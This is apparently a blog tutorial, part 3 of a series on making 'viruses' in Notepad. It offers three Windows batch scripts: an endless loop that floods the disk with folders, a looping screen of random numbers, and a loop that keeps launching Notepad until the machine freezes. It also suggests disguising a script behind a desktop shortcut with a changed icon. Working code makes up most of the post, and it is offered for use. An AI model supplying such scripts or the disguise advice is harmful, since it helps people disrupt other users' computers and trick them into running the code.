How to make viruses using notepad ? [Part 3]


In the Part 2 of Notepad virus guide,I told you about making virus programs (probably unwanted programs :) ) that can affect computer hardware such as your keyboard lights and CD-drive door.In this part,I’m gonna show you how to make notepad viruses that can affect your OS and software.Here we go
Keep in mind that these programs do not heavily affect your computer.You can kill all those virus just by restarting,logging off or just by using Task manager.So don’t panic
Before Starting 
  1. Open Notepad
  2. Select a code from below and paste it in notepad
  3. Save it as <name>.bat
  4. That’s all.If you want to make it more realistic make a shortcut on the desktop and change the icon of it
Making 1000 in One-Click
@echo off
:ionhax
md %random%
goto ionhax
You will have to delete all the 1000 folders manually if you test this..So it’s your own choice
Matrix from CMD ( random text in command prompt)
@echo off
color 02
:ionhax
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto ionhax
Freeze Computer (open app continually)
@echo off
:ionhax
START notepad.exe
goto ionhax
do not test this in your computer,if your computer does not have enough RAM
Part 4 to be posted :)
SHARE

Ashish Kumar

  • Image
  • Image
  • Image
  • Image
  • Image
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Latest Posts

Recent Posts Widget